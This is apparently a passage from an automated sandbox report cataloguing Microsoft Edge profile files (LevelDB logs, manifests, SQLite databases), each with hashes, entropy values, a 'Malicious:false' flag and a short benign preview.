                                                                                                                                                                                                                                                                                                SHA1:F1FB633DE0C88C788BB096D584C095957FAAE4E0
                                                                                                                                                                                                                                                                                                SHA-256:FC4080DBDF319D345F4BD37BBA777DF7222567752986AA07327C0092FD10CA69
                                                                                                                                                                                                                                                                                                SHA-512:8347A25B857FA9ED58B60D16144B0DBEEB8B37D1095BD88C9FBEEC8F6697A860D788F40607B0E91433F608244949D59B26D5F1333BA0AA49B03043E1247D0630
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379149891956490","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):33
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                                MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                                SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                                SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                                SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):313
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.230355358055264
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:PnEWfAj1N723oH+Tcwtp3hBtB2KLl1nAWAjL+q2PN723oH+Tcwtp3hBWsIFUv:QaYebp3dFLFvVaYebp3eFUv
                                                                                                                                                                                                                                                                                                MD5:3B9B95EC908D8C2CE68F37F25E38E518
                                                                                                                                                                                                                                                                                                SHA1:196305D1F1B0059FEEE75B8B52F3B3018ECA593F
                                                                                                                                                                                                                                                                                                SHA-256:646033D26EF24DB80189539CBA5315DAC0AB1EA68756618F036DABE2CF8ABE1D
                                                                                                                                                                                                                                                                                                SHA-512:A759662A84FD97015B66B4A8C7F9E6D9A3C7B8693710F3448B8B62163F117F3E8CD53D8EED0F0444D31B3433FC5A2EF90C9963E7AF17970EB54FDF7CF714C883
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:36.213 15e8 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/20-01:31:36.253 15e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):2163821
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.222870938967056
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24576:IbPMZpVkfI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:IbkZpVkfx2mjF
                                                                                                                                                                                                                                                                                                MD5:67869D93158F19B3661136D47183F773
                                                                                                                                                                                                                                                                                                SHA1:A6DA4DC49E06256F145225E88D0F8244FEF8A663
                                                                                                                                                                                                                                                                                                SHA-256:A6889A0863E55AD2C32603EACD8C801D1143C27A303AF5E7C1A727B025C1616A
                                                                                                                                                                                                                                                                                                SHA-512:5395D6D4848D8B8C5038F71147BCC0194FC837715A60E3E90350CFD9C4D87E3572B74CA219BE67E5A3D700687FEF04DCBF96345092B65A0C89995D6D927DB2FD
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1.f.+.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340960289901340.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):340
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.06016802836377
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:PnKq2PN723oH+Tcwt9Eh1tIFUt8InfZmw+In4UVnFkwON723oH+Tcwt9Eh15LJ:CvVaYeb9Eh16FUt8k/+c5OaYeb9Eh1VJ
                                                                                                                                                                                                                                                                                                MD5:4BC98CB6EDF9B385B55210439D33836F
                                                                                                                                                                                                                                                                                                SHA1:6D6C746A424859CF51687207E9DC33349902B0D7
                                                                                                                                                                                                                                                                                                SHA-256:1FFEDDBE0673895C79B5CCEDA3637A0FD690B21E5473F01EF937576052750FF2
                                                                                                                                                                                                                                                                                                SHA-512:822A608D0533BE6A4387126EDB053C92550EA560F77BC150B716F7CECDA7D612BA4F1EA477EE5B7A02278B8BAA1E521AC4770CB8DC812714315F3AAF96ADBB61
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:36.060 20d4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/20-01:31:36.064 20d4 Recovering log #3.2024/12/20-01:31:36.073 20d4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):340
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.06016802836377
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:PnKq2PN723oH+Tcwt9Eh1tIFUt8InfZmw+In4UVnFkwON723oH+Tcwt9Eh15LJ:CvVaYeb9Eh16FUt8k/+c5OaYeb9Eh1VJ
                                                                                                                                                                                                                                                                                                MD5:4BC98CB6EDF9B385B55210439D33836F
                                                                                                                                                                                                                                                                                                SHA1:6D6C746A424859CF51687207E9DC33349902B0D7
                                                                                                                                                                                                                                                                                                SHA-256:1FFEDDBE0673895C79B5CCEDA3637A0FD690B21E5473F01EF937576052750FF2
                                                                                                                                                                                                                                                                                                SHA-512:822A608D0533BE6A4387126EDB053C92550EA560F77BC150B716F7CECDA7D612BA4F1EA477EE5B7A02278B8BAA1E521AC4770CB8DC812714315F3AAF96ADBB61
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:36.060 20d4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/20-01:31:36.064 20d4 Recovering log #3.2024/12/20-01:31:36.073 20d4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.4631638637686286
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBunK3W:TouQq3qh7z3bY2LNW9WMcUvBunb
                                                                                                                                                                                                                                                                                                MD5:C0CBB4A152BF3AA20206709F52D8E304
                                                                                                                                                                                                                                                                                                SHA1:628B2E0D89105DFCB1A7E42086AC3ED971FEFFFF
                                                                                                                                                                                                                                                                                                SHA-256:F7FDAFCDE381B8E188604AF30A830535CE9FACD4FE47F166CC47F7A32E4A2DBB
                                                                                                                                                                                                                                                                                                SHA-512:FA6DAF40C818D424A799E50CBDE0803706938662F3FD47703AD08C2ECD7FFCE0FFB1D6F32BB2A895B3F18DFD2778103C03E630CFCFB8CC210BEE45ABCCAABD3A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):10240
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                                MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                                SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                                SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                                SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):352
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.140350436860484
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:PF1FN+q2PN723oH+TcwtnG2tMsIFUt8IFzeZmw+IFzaVkwON723oH+TcwtnG2tM2:N1FN+vVaYebn9GFUt8c6/+cWV5OaYebB
                                                                                                                                                                                                                                                                                                MD5:9CD3FD70FFEADB325D53F53AFFB72FFC
                                                                                                                                                                                                                                                                                                SHA1:2B2CCB7ACE1E4FEAD7428B48191F1929139D6562
                                                                                                                                                                                                                                                                                                SHA-256:0BFDD6B15DCA2FD0AACA01FC6CC6C7753008A0EF0699FCF6B2125BB80A8436F1
                                                                                                                                                                                                                                                                                                SHA-512:B0D4A600AB7EC25939B4CC1ACCD3594352929C98A53F791CDEA422ECD2FBC30A8391C708F9C4202B9CE8282442AA6D827118D78D2AF1330465050E8BDEC16C73
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:31.350 1d7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/20-01:31:31.351 1d7c Recovering log #3.2024/12/20-01:31:31.351 1d7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):352
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.140350436860484
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:PF1FN+q2PN723oH+TcwtnG2tMsIFUt8IFzeZmw+IFzaVkwON723oH+TcwtnG2tM2:N1FN+vVaYebn9GFUt8c6/+cWV5OaYebB
                                                                                                                                                                                                                                                                                                MD5:9CD3FD70FFEADB325D53F53AFFB72FFC
                                                                                                                                                                                                                                                                                                SHA1:2B2CCB7ACE1E4FEAD7428B48191F1929139D6562
                                                                                                                                                                                                                                                                                                SHA-256:0BFDD6B15DCA2FD0AACA01FC6CC6C7753008A0EF0699FCF6B2125BB80A8436F1
                                                                                                                                                                                                                                                                                                SHA-512:B0D4A600AB7EC25939B4CC1ACCD3594352929C98A53F791CDEA422ECD2FBC30A8391C708F9C4202B9CE8282442AA6D827118D78D2AF1330465050E8BDEC16C73
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:31.350 1d7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/20-01:31:31.351 1d7c Recovering log #3.2024/12/20-01:31:31.351 1d7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.6132725523844721
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+j2Kjp/MmL:TO8D4jJ/6Up+h1p
                                                                                                                                                                                                                                                                                                MD5:F6B3424BAA0A64BD1B8B03AD6EBA2AA0
                                                                                                                                                                                                                                                                                                SHA1:B0588F344A34715F4AAE7F6428DDDB3FD51B7300
                                                                                                                                                                                                                                                                                                SHA-256:1ACB4B94E5B1BB5850F1A954E9A7137E403C066386CA68299B2CCDE4072CD69C
                                                                                                                                                                                                                                                                                                SHA-512:D281B313594E0FC431155351291E925A9589514E6F378DA9D0BEEAEF739620F6F249EEFCE5D5A2D7623A778ECD97724393AD10EEF0224A6AC19DBD264A3F4FC0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):375520
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.354089591074268
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6144:hA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:hFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                                MD5:FB7FC370F40E7DA5571546427BEBC37A
                                                                                                                                                                                                                                                                                                SHA1:C9AC33C56CF08DC5E1BF758E5BE0F75F06469BDA
                                                                                                                                                                                                                                                                                                SHA-256:FB670CAB4EE2E3B8CA861EFA906DC0B2075DB335417FFFF01C0764295FE128C9
                                                                                                                                                                                                                                                                                                SHA-512:15751FB96C13B9511496BE9379453B5DA60AB1B63046FE647D5BA02B9D161D99B6A49CE4934AF439A14F11643851B42A880637C20BD12FC51112BB963E313DB6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1~Nf.q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13379149898823010..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):315
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.130425150222397
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:Pn605RoM1N723oH+Tcwtk2WwnvB2KLl1nnpMq2PN723oH+Tcwtk2WwnvIFUv:SfsaYebkxwnvFLpMvVaYebkxwnQFUv
